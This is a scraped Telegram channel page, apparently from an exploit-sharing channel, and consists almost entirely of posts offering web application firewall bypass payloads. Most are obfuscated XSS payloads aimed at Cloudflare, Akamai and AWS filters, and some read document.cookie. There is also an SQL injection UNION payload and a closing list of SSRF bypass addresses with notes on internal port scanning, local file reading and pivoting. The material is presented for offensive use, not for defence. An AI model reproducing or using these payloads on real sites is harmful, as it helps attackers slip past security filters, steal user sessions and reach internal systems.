0Day.Today | Learn Exploit | Zero World | Dark web |
@LearnExploit
19.1K subscribers
1.23K photos
127 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
About
Blog
Apps
Platform
Join
0Day.Today | Learn Exploit | Zero World | Dark web |
19.1K subscribers
0Day.Today | Learn Exploit | Zero World | Dark web |
A payload to bypass some WAF

<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>

#‌Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
4👍3🔥2
3.31K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Xss Bypass Waf

&lt;details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//

#bypass #waf
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍10👎1
5.81K views
0Day.Today | Learn Exploit | Zero World | Dark web |
CloudFlare WAF bypass payload

<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;

#WAF #bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥72👍2
5.72K views
0Day.Today | Learn Exploit | Zero World | Dark web |
An Akamai WAF bypass payload

%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22

#Waf #bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍91
6.43K views
0Day.Today | Learn Exploit | Zero World | Dark web |
An Akamai WAF bypass payload

1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>


#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥3👍1
3.14K views
0Day.Today | Learn Exploit | Zero World | Dark web |
A payload to bypass WAF

<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//


#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥4
3.17K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Cloudflare WAF Bypass ⚡️

<a"/onclick=(confirm)(origin)>Click Here!

#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
4
3.34K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
This media is not supported in your browser
VIEW IN TELEGRAM
Fuzzing and Bypassing the AWS WAF

Github

Read Here

#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍32🔥1
2.96K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
43🔥3👍1
3.92K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Cloudflare WAF Bypass Leads to Reflected XSS ®️

Payload Used : "&gt;&lt;img src=x onerror=alert(1)&gt; [Blocked By Cloudflare]

Payload Used : "&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt; [XSS Popup]

#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥42👍1👎1
3.87K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Akamai WAF bypass XSS
 
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol 
          contenteditable
          onbeforeinput='location=b.value+c.value+d.value'>
click and write here!


#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥4🔥3💯211
3.2K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
bypass XSS Cloudflare WAF

Encoded Payload:

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

Clean Payload:

"><track/onerror='confirm`1`'>

HTML entity & URL encoding:

" --> &#34;
> --> &gt;
< --> &lt;
' --> &#x27;
` --> \%60

#Bypass #XSS #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥8👍4
3.06K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5
3.57K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Xss Payload

<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>

#xss #Bypass #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥4👍1
3.45K views
0Day.Today | Learn Exploit | Zero World | Dark web |
CloudFlare XSS protection WAF Bypassed 💎

<Img Src=OnXSS OnError=confirm(document.cookie)>

#WAF #XSS #Bypass #CloudFlare
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍621
3.52K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Bypassed strong Akamai WAF

payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

#Waf #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥3🔥1
3.27K views
0Day.Today | Learn Exploit | Zero World | Dark web |
payload to bypass Akamai WAF

?foobar=<foo%20bar=%250a%20onclick=<your js code>

#WAF #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3👎1
3.47K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
Sql injection Manual Bypass WAF

Payload :

'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-

#sql_injection #Bypass #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥7👍2👎21😁1
4.48K views
0Day.Today | Learn Exploit | Zero World | Dark web |
A Cloudflare WAF bypass combining simple (but efficient) tricks

<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1>`

A payload with some obfuscation & filter evasion tricks

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>

#CF #WAF #Bypass #Payload

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
43🔥2👍1
3.42K views
0Day.Today | Learn Exploit | Zero World | Dark web |
SSRF Payloads To Bypass Firewall

Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):

1) Bypass SSRF with CIDR:
http://127.127.127.127
http://127.0.0.0

2) Bypass using rare address:
http://127.1
http://0

3) Bypass using tricks combination:
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3

4) Bypass against a weak parser:
http://127.1.1.1:80\@127.2.2.2:80/

5) Bypass localhost with [:]:
http://[::1:80/
http://0000::1:80/

Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:

Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.

For example:
We discover that the following URL works:


https://example.com: 8000/page?
user=&link=https://127.0.0.1:8000


We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network

#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍3💔3
2.29K viewsedited